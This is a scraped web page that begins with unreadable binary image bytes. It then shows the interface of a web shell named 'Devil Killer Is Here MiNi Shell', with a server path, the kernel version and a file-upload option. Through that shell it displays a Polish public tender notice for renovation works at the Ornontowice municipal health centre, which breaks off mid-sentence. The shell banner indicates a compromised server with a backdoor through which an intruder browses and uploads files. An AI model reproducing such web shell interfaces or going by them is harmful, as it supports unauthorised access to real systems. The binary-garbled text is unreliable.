JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250730/0035263201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ROBOTY BUDOWLANE w Gminnym Ośrodku Zdrowia w Ornontowicach w ramach Projektu grantowego nr FENIX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Zdrowia w Ornontowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">-</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 273515190</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Klasztorna1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ornontowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-178</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">goz@goz.ornontowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.goz.ornontowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ROBOTY BUDOWLANE w Gminnym Ośrodku Zdrowia w Ornontowicach w ramach Projektu grantowego nr FENIX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e6684f1-b3df-4019-afa4-0ae9aa121bdd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00352632</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00227144/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 ROBOTY BUDOWLANE w Gminnym Ośrodku Zdrowia w Ornontowicach w ramach Projektu grantowego nr FENIX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> W ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://goz-ornontowice.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://goz-ornontowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określono w SWZ w:<br/>ROZDZIAŁ X - Środki komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z Wykonawcami, oraz<br/>informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej -<br/>strona 8-9 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOZ/TP/2/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja przedsięwzięcia w projekcie pn. „Wsparcie podstawowej opieki zdrowotnej<br/>(POZ)” t.j. wykonanie prac/robót budowlanych w Gminnym Ośrodku Zdrowia w Ornontowicach polegających na<br/>dostosowaniu i poprawie funkcjonalności pomieszczeń służących udzielaniu świadczeń oraz poszerzeniu zakresu<br/>świadczeń zdrowotnych w zakresie profilaktyki, diagnostyki i leczenia na poziomie POZ z założeniem, że przedmiotowe<br/>roboty nie zmieniają kubatury budynku oraz nie wymagają dodatkowych pozwoleń/zgód.<br/>Przedmiot zamówienia obejmuje w szczególności:<br/>a. roboty rozbiórkowe, przygotowawcze i wykończeniowe, demontaż, montaż, adaptację pomieszczeń, instalacje i itp.<br/>polegające na dostosowaniu i poprawie funkcjonalności pomieszczeń w GOZ Ornontowice.<br/>Szczegółowy opis przedmiotu zamó¬wienia zawarty jest w Kosztorysie, stanowiącym Załącznik nr 14 do SWZ.<br/>b. udzielenie nie mniejszej niż 24-miesięcznej gwarancji na wykonane roboty budowlane, z przekazaniem dokumentów<br/>potwierdzających udzielone gwarancje, wg wzoru Karty Gwarancyjnej stanowiącej Załącznik Nr 11 do SWZ.<br/>Roboty budowlane finansowane są z budżetu państwa oraz z budżetu środków europejskich w ramach powierzonego<br/>Grantu w ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej<br/>(POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, <br/>współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego, realizowanego na podstawie umowy nr<br/>FENX.06.01-IP.03-0001/23-00/1374/2024/17 zawartej w dniu 27.03.2024 r. pomiędzy Skarbem Państwa – Ministrem<br/>Zdrowia a Narodowym Funduszem Zdrowia.<br/>2. Ogólną Specyfikację Wykonywania i Odbioru Robót Budowlanych zawiera Załącznik Nr 9 do SWZ.<br/>3. Opis i oznaczenie przedmiotu zamówienia wg CPV:<br/>45000000-7 Roboty budowlane,<br/>45262600-7 Różne specjalne roboty budowlane,<br/>45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne,<br/>45450000-6 Roboty budowlane wykończeniowe, pozostałe,<br/>45453000-7 Roboty remontowe i renowacyjne.<br/>4. Zamawiający nie dopuszcza składania ofert częściowych ani ofert wariantowych. Oferta musi obejmować całość<br/>zamówienia. Oferta częściowa stanowić będzie ofertę o treści niezgodnej z warunkami zamówienia i zostanie odrzucona,<br/>zgodnie z art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>5. Uzasadnienie niedokonania podziału zamówienia na części (art. 91 ust. 1 ustawy Pzp):<br/>W przedmiotowym postępowaniu Zamawiający nie dopuszcza możliwości składania ofert częściowych (przedmiot<br/>zamówienia nie jest podzielny).<br/>Podział zamówienia na części jest niemożliwy z przyczyn technologicznych i wykonawczych, gdyż spowoduje nadmierne<br/>trudności techniczne, zaś potrzeba skoordynowania działań różnych wykonawców realizujących poszczególne etapy<br/>zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia, co w konsekwencji mogłoby spowodować, iż<br/>łączny efekt prac kilku wykonawców mógłby uczynić niemożliwym osiągnięcie celu zamówienia publicznego.<br/>6. Wykonawca, w ramach niniejszego zamówienia, zobowiązany jest wykonać wszystkie prace zgodnie z zasadami wiedzy<br/>technicznej i sztuki budowlanej, obowiązującymi przepisami i normami, przy dołożeniu należytej staranności, by przedmiot,<br/>którego zakres został określony w SWZ, osiągnął gotowość do eksploatacji. Ryczałtowe wynagrodzenie za wykonanie<br/>przedmiotu niniejszego zamówienia obejmuje kompleksowe wykonanie tego przedmiotu zamówienia (w tym również<br/>wykonanie robót budowlanych nieujętych a, niezbędnych do wykonania ze względu na wiedzę techniczną), jak również<br/>wszelkich robót i czynności limitujących odbiór końcowy przedmiotu zamówienia, niezależnie od tego, czy były one<br/>przewidziane przez Wykonawcę na dzień złożenia oferty.<br/>7. Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>8. Celem prowadzenia robót budowlanych jest dostosowanie i poprawa funkcjonalności pomieszczeń służących udzielaniu<br/>świadczeń oraz poszerzeniu zakresu świadczeń zdrowotnych w zakresie profilaktyki, diagnostyki<br/>i leczenia na poziomie POZ z założeniem, że przedmiotowe roboty nie zmieniają kubatury budynku oraz nie wymagają<br/>dodatkowych pozwoleń/zgód. Zamówione i wykonane prace budowlane muszą dotyczyć wyłącznie pomieszczeń służących<br/>udzielaniu świadczeń, co do których Grantobiorca posiada wyłączne prawo użytkowania.<br/>Dodatkowe wymagania związane z realizacją zamówienia.<br/>1. Zamawiający zastrzega sobie możliwość żądania oświadczenia o sposobie zatrudnienia pracowników realizujących<br/>umowę.<br/>2. Wykonawca jest zobowiązany uwzględnić w swoje ofercie wartości wynagrodzeń wynikające z wysokości minimalnego<br/>wynagrodzenia za pracę w danym roku, zgodnie z obowiązującymi przepisami, w tym zapewnienia stawki minimalnej w<br/>przypadku innej podstawy zatrudnienia, przy czym w przypadku innych podstaw zatrudnienia Wykonawca zatrudniający<br/>pracowników ponosi wyłączną odpowiedzialność z tytułu realizacji zobowiązań takich jak odprowadzania za te osoby<br/>stosownych zaliczek z tytułu podatku od osób fizycznych, czy zaliczek na ubezpieczenie, społeczne, zdrowotne, itd.<br/>3. Obowiązek zatrudnienia na podstawie umowy o pracę nie dotyczy sytuacji, w której wykonawca, podwykonawca lub<br/>dalszy podwykonawca osobiście wykonuje powyższe czynności (np. osoba fizyczna prowadząca działalność gospodarczą,<br/>wspólnicy spółki cywilnej).<br/>Wizja lokalna<br/>Zamawiający opisał przedmiot zamówienia w sposób jednoznaczny, wyczerpujący, z zachowaniem zasad uczciwej<br/>konkurencji - dlatego wymaga odbycia wizji lokalnej.<br/>Brak odbycia wizji lokalnej spowoduje odrzucenie oferty.<br/>W sprawie odbycia wizji należy się kontaktować telefonicznie, ze stosownym (co najmniej 2-dniowym) wyprzedzeniem, z<br/>Panią Weroniką Zientek, tel. kom. 501-330-173, e-mail: weronika.zientek@goz.ornontowice.pl<br/>Jednocześnie Zamawiający informuje, że podczas wizji lokalnej nie będą przyjmowane żadne zapytania ani udzielane<br/>żadne wyjaśnienia dotyczące treści SWZ.<br/>Zapytania takie należy kierować do Zamawiającego zgodnie z zapisami SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 112 ust. 2<br/>ustawy Pzp dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedłoży odpis z właściwego rejestru lub z centralnej ewidencji<br/>i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, potwierdzający<br/>niepodleganie wykluczeniu na podstawie art. 109 ust. 1 pkt 4) ustawy z dnia 11.09.2024 r. Prawo zamówień publicznych.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie stawia warunków w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna za spełniony warunek jeśli wykonawca wykaże, że posiada dokument potwierdzający, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną nie niższą niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, gdy Wykonawca:<br/>a. wykaże się wykonaniem, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączy dowody określające czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Zamawiający uzna<br/>warunek za spełniony, gdy Wykonawca wykaże, że wykonał 2 (dwie) roboty budowlane w obiektach ochrony zdrowia (wg<br/>Załącznika nr 8 do SWZ),<br/>b. wykaże się osobami, skierowanymi przez Wykonawcę do realizacji zamówienia publicznego,<br/>(wg Załącznika nr 14 do SWZ) - jeżeli dotyczy.<br/>2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, stosownie do zapisów zawartych w art. 58-60 ustawy<br/>Pzp. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, brak istnienia podstaw wykluczenia z udziału w<br/>postępowaniu musi być wykazany wobec każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zgodnie z art. 125 ust. 4 ustawy Pzp.<br/>3. Wykonawcy, o których mowa w art. 58 ust. 1 ustawy Pzp ponoszą solidarną odpowiedzialność za wykonanie umowy (art.<br/>445 ust. 1 ustawy Pzp).<br/>4. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego, oceniany<br/>będzie łączny potencjał techniczny i zawodowy oraz łączne kwalifikacje i doświadczenie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Określono w SWZ w Rozdziale IX<br/>strona 7 i 8 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda, złożenia wraz z ofertą, przedmiotowe środki dowodowe <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ROZDZIAŁ VII - Zawartość oferty, w tym wykaz oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu<br/>oraz brak podstaw wykluczenia.<br/>1. Wypełniony i podpisany przez osobę uprawnioną do reprezentowania Wykonawcy Formularz Oferty stanowiący -<br/>Załącznik Nr 1 do SWZ,<br/>2. Wypełnioną i podpisaną przez osobę uprawnioną do reprezentowania Wykonawcy Ofertę Cenową stanowiącą - Załącznik<br/>Nr 2 do SWZ,<br/>3. Aktualne na dzień składania ofert Oświadczenie Wykonawcy w zakresie podstaw do wykluczenia i spełnienia warunków<br/>udziału w postępowaniu, stanowiące - Załącznik Nr 3 do SWZ.<br/>4. Aktualne na dzień składania ofert Oświadczenie podmiotu udostępniającego zasoby dotyczące spełniania warunków<br/>udziału w postępowaniu i niepodleganiu wykluczeniu, stanowiące - Załącznik Nr 4 do SWZ.<br/>5. Wypełnione i podpisane przez osobę uprawnioną do reprezentowania Wykonawcy Oświadczenie o podwykonawcach,<br/>stanowiące - Załącznik Nr 5 do SWZ.<br/>6. Podpisane przez osobę uprawnioną do reprezentowania Wykonawcy Oświadczenie Wykonawcy, stanowiące - Załącznik<br/>Nr 12 do SWZ.<br/>7. Pełnomocnictwo - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, stosownie do zapisów zawartych w art. 58-60 ustawy<br/>Pzp. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, brak istnienia podstaw wykluczenia z udziału w<br/>postępowaniu musi być wykazany wobec każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zgodnie z art. 125 ust. 4 ustawy Pzp.<br/>2. Wykonawcy, o których mowa w art. 58 ust. 1 ustawy Pzp ponoszą solidarną odpowiedzialność za wykonanie umowy (art.<br/>445 ust. 1 ustawy Pzp).<br/>3. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego, oceniany<br/>będzie łączny potencjał techniczny i 